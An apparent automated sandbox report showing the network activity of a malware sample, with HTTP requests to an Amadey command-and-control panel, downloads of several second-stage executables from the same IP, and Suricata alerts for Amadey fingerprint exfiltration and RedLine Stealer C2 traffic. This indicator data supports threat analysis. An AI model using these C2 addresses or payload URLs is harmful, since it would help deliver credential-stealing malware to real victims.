NetWork | ZeroBOX

IP Address	Status	Action
185.215.113.16	Active	Moloch
185.215.113.67	Active	Moloch
103.28.36.182	Active	Moloch
164.124.101.2	Active	Moloch
38.180.203.208	Active	Moloch

Name	Response	Post-Analysis Lookup
coe.com.vn	A 103.28.36.182	103.28.36.182
mkstat595.xyz

TCP Requests

UDP Requests

POST 200 http://185.215.113.16/Jo89Ku7d/index.php

:	POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type:	application/x-www-form-urlencoded
Host:	185.215.113.16
Content-Length:	4
Cache-Control:	no-cache

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	text/html; charset=UTF-8
Transfer-Encoding:	chunked
Connection:	keep-alive
Refresh:	0; url = Login.php

POST 200 http://185.215.113.16/Jo89Ku7d/index.php

:	POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type:	application/x-www-form-urlencoded
Host:	185.215.113.16
Content-Length:	160
Cache-Control:	no-cache

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	text/html; charset=UTF-8
Transfer-Encoding:	chunked
Connection:	keep-alive

GET 200 http://185.215.113.16/inc/build.exe

:	GET /inc/build.exe HTTP/1.1
Host:	185.215.113.16

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	application/octet-stream
Content-Length:	11267584
Last-Modified:	Thu, 25 Jul 2024 14
Connection:	keep-alive
ETag:	"66a25e06-abee00"
Accept-Ranges:	bytes

POST 200 http://185.215.113.16/Jo89Ku7d/index.php

:	POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type:	application/x-www-form-urlencoded
Host:	185.215.113.16
Content-Length:	31
Cache-Control:	no-cache

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	text/html; charset=UTF-8
Transfer-Encoding:	chunked
Connection:	keep-alive

GET 200 http://185.215.113.16/inc/crypted.exe

:	GET /inc/crypted.exe HTTP/1.1
Host:	185.215.113.16

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	application/octet-stream
Content-Length:	967168
Last-Modified:	Thu, 25 Jul 2024 14
Connection:	keep-alive
ETag:	"66a25df6-ec200"
Accept-Ranges:	bytes

POST 200 http://185.215.113.16/Jo89Ku7d/index.php

:	POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type:	application/x-www-form-urlencoded
Host:	185.215.113.16
Content-Length:	31
Cache-Control:	no-cache

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	text/html; charset=UTF-8
Transfer-Encoding:	chunked
Connection:	keep-alive

GET 200 http://185.215.113.16/inc/5447jsX.exe

:	GET /inc/5447jsX.exe HTTP/1.1
Host:	185.215.113.16

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	application/octet-stream
Content-Length:	401920
Last-Modified:	Thu, 25 Jul 2024 14
Connection:	keep-alive
ETag:	"66a25df5-62200"
Accept-Ranges:	bytes

POST 200 http://185.215.113.16/Jo89Ku7d/index.php

:	POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type:	application/x-www-form-urlencoded
Host:	185.215.113.16
Content-Length:	31
Cache-Control:	no-cache

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	text/html; charset=UTF-8
Transfer-Encoding:	chunked
Connection:	keep-alive

GET 200 http://185.215.113.16/inc/crypteda.exe

:	GET /inc/crypteda.exe HTTP/1.1
Host:	185.215.113.16

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	application/octet-stream
Content-Length:	1464832
Last-Modified:	Thu, 25 Jul 2024 14
Connection:	keep-alive
ETag:	"66a25e80-165a00"
Accept-Ranges:	bytes

POST 200 http://185.215.113.16/Jo89Ku7d/index.php

:	POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type:	application/x-www-form-urlencoded
Host:	185.215.113.16
Content-Length:	31
Cache-Control:	no-cache

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	text/html; charset=UTF-8
Transfer-Encoding:	chunked
Connection:	keep-alive

POST 200 http://185.215.113.16/Jo89Ku7d/index.php

:	POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type:	application/x-www-form-urlencoded
Host:	185.215.113.16
Content-Length:	31
Cache-Control:	no-cache

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	text/html; charset=UTF-8
Transfer-Encoding:	chunked
Connection:	keep-alive

GET 200 http://185.215.113.16/inc/svhosts.exe

:	GET /inc/svhosts.exe HTTP/1.1
Host:	185.215.113.16

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	application/octet-stream
Content-Length:	707072
Last-Modified:	Thu, 25 Jul 2024 14
Connection:	keep-alive
ETag:	"66a25edc-aca00"
Accept-Ranges:	bytes

POST 200 http://185.215.113.16/Jo89Ku7d/index.php

:	POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type:	application/x-www-form-urlencoded
Host:	185.215.113.16
Content-Length:	31
Cache-Control:	no-cache

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	text/html; charset=UTF-8
Transfer-Encoding:	chunked
Connection:	keep-alive

GET 200 http://185.215.113.16/inc/25072023.exe

:	GET /inc/25072023.exe HTTP/1.1
Host:	185.215.113.16

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	application/octet-stream
Content-Length:	311296
Last-Modified:	Thu, 25 Jul 2024 14
Connection:	keep-alive
ETag:	"66a265c4-4c000"
Accept-Ranges:	bytes

POST 200 http://185.215.113.16/Jo89Ku7d/index.php

:	POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type:	application/x-www-form-urlencoded
Host:	185.215.113.16
Content-Length:	31
Cache-Control:	no-cache

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	text/html; charset=UTF-8
Transfer-Encoding:	chunked
Connection:	keep-alive

GET 200 http://185.215.113.16/inc/pered.exe

:	GET /inc/pered.exe HTTP/1.1
Host:	185.215.113.16

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	application/octet-stream
Content-Length:	11437924
Last-Modified:	Thu, 25 Jul 2024 14
Connection:	keep-alive
ETag:	"66a26859-ae8764"
Accept-Ranges:	bytes

POST 200 http://185.215.113.16/Jo89Ku7d/index.php

:	POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type:	application/x-www-form-urlencoded
Host:	185.215.113.16
Content-Length:	31
Cache-Control:	no-cache

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	text/html; charset=UTF-8
Transfer-Encoding:	chunked
Connection:	keep-alive

GET 200 http://185.215.113.16/inc/2020.exe

:	GET /inc/2020.exe HTTP/1.1
Host:	185.215.113.16

:	HTTP/1.1 200 OK
Server:	nginx/1.18.0 (Ubuntu)
Date:	Fri, 26 Jul 2024 01
Content-Type:	application/octet-stream
Content-Length:	12946352
Last-Modified:	Thu, 25 Jul 2024 15
Connection:	keep-alive
ETag:	"66a2701b-c58bb0"
Accept-Ranges:	bytes

ICMP traffic

Source	Destination	ICMP Type	Data
192.168.56.103	164.124.101.2	3

IRC traffic

No IRC requests performed.

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.215.113.16:80 -> 192.168.56.103:49164	2400032	ET DROP Spamhaus DROP Listed Traffic Inbound group 33	Misc Attack
TCP 192.168.56.103:49164 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49164	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.215.113.16:80 -> 192.168.56.103:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.16:80 -> 192.168.56.103:49164	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2022491	ET HUNTING Download Request Containing Suspicious Filename - Crypted	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.16:80 -> 192.168.56.103:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49167	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49201 -> 103.28.36.182:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49204 -> 103.28.36.182:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 103.28.36.182:443 -> 192.168.56.103:49205	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 103.28.36.182:443 -> 192.168.56.103:49213	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49216 -> 103.28.36.182:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49167	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.67:40960 -> 192.168.56.103:49222	2400032	ET DROP Spamhaus DROP Listed Traffic Inbound group 33	Misc Attack
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49211 -> 103.28.36.182:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49212 -> 103.28.36.182:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49215 -> 103.28.36.182:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 185.215.113.67:40960 -> 192.168.56.103:49222	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 103.28.36.182:443 -> 192.168.56.103:49217	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 185.215.113.67:40960 -> 192.168.56.103:49222	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 38.180.203.208:14238 -> 192.168.56.103:49228	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 38.180.203.208:14238 -> 192.168.56.103:49228	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49222 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49228 -> 38.180.203.208:14238	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 185.215.113.16:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts